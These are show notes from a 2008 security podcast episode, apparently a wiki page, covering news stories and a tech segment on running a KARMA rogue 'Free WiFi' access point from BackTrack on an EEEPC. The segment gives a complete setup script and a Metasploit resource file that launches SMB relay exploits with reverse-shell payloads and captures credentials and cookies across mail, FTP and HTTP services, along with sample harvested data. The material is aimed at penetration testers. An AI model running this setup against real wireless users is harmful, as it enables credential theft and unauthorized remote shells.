Episode114

From Paul's Security Weekly
Revision as of 23:01, 10 July 2008 by Pauldotcom (Talk | contribs) (Announcements & Shameless Plugs)

Jump to: navigation, search
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security
BlackSquirrel
Onapsis

Sponsors

This episode is sponsored by Core Security Technologies, helping you penetrate your network. Rock out with your 'sploit out and check out the client side exploit and web application testing modules! Listen to this podcast and qualify to receive a 10% discount on Core Impact, worlds best penetration testing tool.

This podcast is also sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notibly the creators of Nessus, the worlds best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Direct Feed subscription for immediate access to new Nessus plugins, and compliance checks” Tenable – Unified Security Monitoring!

Announcements & Shameless Plugs

Live from the PaulDotCom Studios Welcome to PaulDotCom Security Weekly, Episode 114 for July 10th, 2008

Welcome to PaulDotCom Security Weekly, a show for security professionals, by security professionals.

DC401!!!! Whooohoo! Check out the shirts!

Tech Segment: EEEPC + Backtrack + Ubuntu = Cool

Things you will need:

So I started by creating an Ubuntu installable USB thumb drive (8.04). I downloaded the ISO image and used unetbootin to create a bootable USB thumb drive (don't forget to put the USB thumb drive in your computer, and don't overwrite your c drive, cuz that would be the suck):


I installed ubuntu, but did some different stuff to make it run better on the EEEPC:

  • I used the entire flash drive as the root mount point
  • I eliminated the swap partition (flash does not like to be written to a lot :)
  • I used ext2 filesystem, supposedly less disk writes
  • I had to remove the battery and unplug the system, then fire it up again before the Ethernet would work
  • I immediately upgraded the system (I used aptitude, aptitude update, aptitude upgrade, aptitude distupgrade).

Now we've got a USB thumb drive with Ubuntu, and a working distribution on our EEEPC. I found that the Ubuntu distro was far better than the installed OS. I did have to install some updated Madwifi drivers to get the wireless working, instructions at the link above. I plan to install some basic security tools such as Nmap, Metasploit, and maybe some wireless tools. Of course, now that we know the process, getting Backtrack 3 on this platform is simple.

Download the USB edition of Backtrack 3, and then use unetbootini to boot up the EEEPC. I should mention that you will need to press the ESC key at bootup to get the boot menu, then choose the USB drive to boot from. When the backtrack menu comes up I chose the first window manager, compviz. I had to press ctrl-alt-numlock a few times to get the video to sync properly.

Once BT3 has booted up, its time to use it to pwn people using wireless. This is a great thing to have on a penetration test in my opinion, as it can be used to grab user credentials, which is a valuable thing to go after as it leads to the crown jewlels. The best part is that we're not relying on exploits, vulnerability scanning, portscanning, or any other activities that may give ourselves away. The only gotcha is that your in range of the clients 802.11b/g radios. In fact, this should work just as KARMA does, so clients connecting to ANY SSID will fall victim.

Okay, so the first thing that you need to do is update Metasploit. Go to the BT3 menu and select Backtrack -> Penetration -> Framework Version 3 -> Framwork3 msfupdate. This performs an svn update and grabs the latest MSF. Next, we need to modify the "Evilap.sh" script which is located in:

/pentest/wireless/karma-msf-scripts-0.01/evilap.sh


This is the script that sets up all of our evil :) It reads as follows after I modified it:

#!/bin/sh


# Create the master mode interface
/pentest/wireless/karma-msf-scripts-0.01/athap.sh

# Change it to a random mac
macchanger -A ath0

# Enable KARMA mode
iwpriv ath0 karma 1

# Configure the interface
iwconfig ath0 mode master
iwconfig ath0 channel 6
iwconfig ath0 essid "Free WiFi"
ifconfig ath0 up 10.0.0.1 netmask 255.255.255.0

# Kill any background copies of this
killall -9 dhcpd tcpdump

# Clear the leases file and start DHCPD
echo > /var/state/dhcp/dhcpd.leases
dhcpd -cf /etc/dhcpd.conf ath0

# Use antenna 2 only (no diversity) for my EEE
# /pentest/wireless/karma-msf-scripts-0.01/athsetantenna.sh 2

# Start up tcpdump
tcpdump -ni ath0 -s 0 -w /pentest/wireless/karma-msf-scripts-0.01/evilap_eth.cap >/dev/null 2>&1 &

# Start up metasploit
/pentest/exploits/framework3/msfconsole -r /pentest/exploits/framework3/karma.rc

All I changed was the last line, which points it to our metasploit instance on BT3. Keep in mind, these changes are only temporary and I have to update the BT3 files in order to make them permanent (maybe in the next tech segment :) If you want to use an SSID other than "Free WiFi", then modify the line above in the file. It sets up the wireless interface, turns on Karma mode, runs a DHCP server on the wireless interface, and fires up a sniffer to collect traffic (however this does not appear to work currently). You will notice that when we run metasploit, we give it an rc file, which is a set of metasploit commands, which are as follows:

load db_sqlite3
db_create /root/karma.db

use exploit/windows/smb/smb_relay
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.0.0.1
set SRVPORT 139
set LPORT 1390
exploit

use exploit/windows/smb/smb_relay
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.0.0.1
set SRVPORT 445
set LPORT 4450
exploit


use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run

use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run

use auxiliary/server/capture/ftp
run

use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run

use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run

use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run

use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run

use auxiliary/server/fakedns
run

use auxiliary/server/capture/http
set SRVPORT 80
set BGIMAGE /msf3/load.gif
set SSL false
run

use auxiliary/server/capture/http
set SRVPORT 8080
set BGIMAGE /msf3/load.gif
set SSL false
run

use auxiliary/server/capture/http
set SRVPORT 443
set BGIMAGE /msf3/load.gif
set SSL true
run

use auxiliary/server/capture/http
set SRVPORT 8443
set BGIMAGE /msf3/load.gif
set SSL true
run

Wow, all kinds of fun stuff here. The first thing it does is setup a database, which is where all of our results will be stored. Next, it loads modules to put up a captive portal for the user and collect all user cookies. It does this in an ingenious way, it actually tells the browser to connect to a list of popular web sites (which can be modified, do a "show options" once metasploit loads after running evilap.sh to see where to edit the files). Once the browser connects to the web sites, metasploit logs all of the requests and cookies to the database. The database, stored in /root/karma.db, can then be exported to HTML using the following commands:

cd /root
sqlite3 karma.db
sqlite>.mode html
sqlite>.output karma.html
sqlite>select * from notes;

Karma.html now contains all the juicy info:

1 2008-07-10 18:43:03 1 http_cookies www.google.com PREF=ID=<>:LM=1213206420:GM=1:S=a<>0; NID=11=<morecookie>; SID=<mycookie>

Oh, and metasploit also responds to ANY ftp requests:

18:44:44 1 auth_ftp AUTH 0.0.0.0:21 pauldotcom thisis my ftp password 

This is just fantastic! I plan to use this on penetration tests, and my next mod will be to have it actually deploy a core agent and/or msfpayload. The danger with this is that you must be certain that you are attacking clients owned by the customer. For example, what if a contractor is using the customer's wifi and you deploy an agent to it? Oops, its one thing to review the traffic on the wire and cookies, another to install agents. Props to HD Moore and the three M's of the BT project for putting this altogether and saving a huge amount of setup time.

NOTE: There was a note on #remote-exploit about updated madwifi drivers for EEEPC running BT3 which I need to research further.

Stories for Discussion

Java FAIL - [Larry] Ouch. what ever happened to that whole Java sandbox stuff? Apparently the latest version (and some older ones as well) can allow for remote access of files on the host system, and remote code execution. Yikes. So, want to just use the tools on the system? Try doing netcat without netcat - say shoveling a shell via lpt mapped to your destination on port 9100...

Webroot Founder Missing - [PaulDotCom] - At first, I thought this could be a conspiracy by the Russian mafia, out to get all of those anti-spyware people. After reading the article, the founder was obviously ill, found running naked in the streets, diagnosed with bipolar disorder, and then went to the bathroom and never came back. I feel bad for his family and hope that he is found safe and seeks treatment, but part of me can't help but think he may have been nabbed by spyware authors, I guess I'm too big an X-Files fan for my own good. Maybe they poised his food to make him crazy? Where's Mulder when you need him! SCully!

DNS, story of the decade) - [Larry - Literally almost a decade. Kudos to Dan Kaminsky, but apparently this bug (which is light on details), may have been found as early as 2000, and re-reported in 2005, but labeled as "not possibe", "theoretical" and "sensationalized". Here's a link to the original 2005 paper from Ian and some links from Craig Wright.

Consumer and IT technology blends, security? - [PaulDotCom] - While technology permiates into mainstream culture in the form of more sophisticated cell phones and entertainment devices, where is security in this picture? My glimse into the future is that your cell phone will slowly replace much of your technology on-the-go. For example, the iphone is heading down this path, its already your mobile web/email, GPS, fast internet connection, music, and video provider. It will soon replace the radio in your car, the gps, books, magazines, etc... This means that transactions will be conducted on it, you will purchase music, movies, and other forms of entertainment. All those RFID devices, expass mobilepass, all right on your phone. Guess what, attackers will be taking notice and SPAM will soon follow, as will nasty attacks that target your information for personal gain. We're going down the same path with mobile devices as we have with standard computers. Enterprise features, such as remote wipe, key lock out, disabling features, are key to success, but in the end a secure design wins.

AutoRun - [Larry] - "Microsoft Windows AutoRun Bug May Let Users Execute Arbitrary Code". No kidding, really? It gets worse! when you set the NoDriveTypeAutoRun registry value on some systems to disable autorun, it isn't enforced - meaning autorun still works...Can you say Vista anyone?

Don't bring a knife to a gun fight - [PaulDotCom] - Laptop users are roaming around everywhere, exposing their computers to the dangers of the Internet outside your corporate protections. Don't think that whole disk encryption will save you from the perils of mobile computing users, and neither will Anti-Virus for that matter. Attacks against wireless drivers, protocols, operating systems, and applications are just too great to keep up with standard patching and anti-virus. Consider different methods to protect information, such as user training, using IPS on your local LAN and segment mobile users, strict group policy settings, and OS hardening to further protect your assets.

Toll Hacking - [Larry] - Yeah, go figure, the FasTrak toll payment system based on RFID is easily hackable, cloneable and so forth. The researcher uses his own sniffer to capture data of passing autos, and the information can be used to determine account info.

Caller-ID Spoofing Protection - [PaulDotCom] - Everyone wants to use 012-345-6789 as the caller ID, and do other things that should be easily tracable. First, can't we create a list of known spoofed addresses and treat them appropriately, like, send them to a special voicemail box? For example, youmail.com, my voicemail provider, allows you to create a white list of numbers, which would stop the obvious called ID spoofing. But if someone spoofs the caller id of a number in your whitelist, how can we detect and prevent that? I don't know the answer, just food for thought. This protection would be a nice add-on to a service such as youmail.com

RSnake pwns Chihuahuas - [Larry] ...then gets owned himself. It just goes to show that even innocent issues with web apps can wreak havok - and several folks can figure it out...

Grab that ******* - [PaulDotCom] - Cool little snippet of Javascript to reveal the password that has been obfustacted with *****. Why is it I never want to browse the web again? I mean, you can disable Javascript, but that breaks 90% of web sites. Are there any protections for malicious Javascript? Ronald has some cool thoughts about Javascript protections he implemented in Opera. The list of protections in his tool called "Arioso" is:

  • Arioso enumerates all links inside a website looking for dangerous URI schemes
  • Arioso blocks remote JS files that are not coming from the same-domain (strict SOP)
  • Arioso scans remote and same-origin Javascript before it gets rendered and kills the script if needed.
  • When it is done, it creates a bar in the browser alerting the issue at hand.


Wifi autos - sk33t sh00ting. This will be interesting when our cars start having integrated wifi. Why you ask? how about for the same reasons we brought up about wifi on planes. will the sensor network, and the wifi network be connected?

Sexy Hacking - [Larry] - "Sexy Hacking is creating a series of online videos where sexy girls teach hacking techniques, tips, how-to's, tools, social engineering, security industry news and spoofs. Why read some boring news article or lame documentation when you can get the goods demonstrated by a sexy hacker girl? This is real information security - just sexier. "

Dammit, why didn't we think of this. Oh yea, we don't know enough hax0r babes.

40% of users surf with unpatched browsers - [PaulDotCom] - Wow, so this is something to note if you are a pen tester, and especially if you are on the defense side. Firefox was found to be the most patched, and many are still using IE6, which by default was lumped into the unsafe category. As an attacker, this should be a target, esp. on wireless networks. On the defense, you have to keep these up to date and really weigh the risk, even if it breask stuff. How critical is the broken stuff?

Radmin default install vuln? - [Larry] - We recommend RAdmin all of the time as a better remote access solution however this vulnerability is waaaay off the mark - all you need to do is find the listening service and guess the password - unless you use NTLM auth - which all you need to do is find the service and guess the password - which if the password is weak in either situation, it is game over anyways!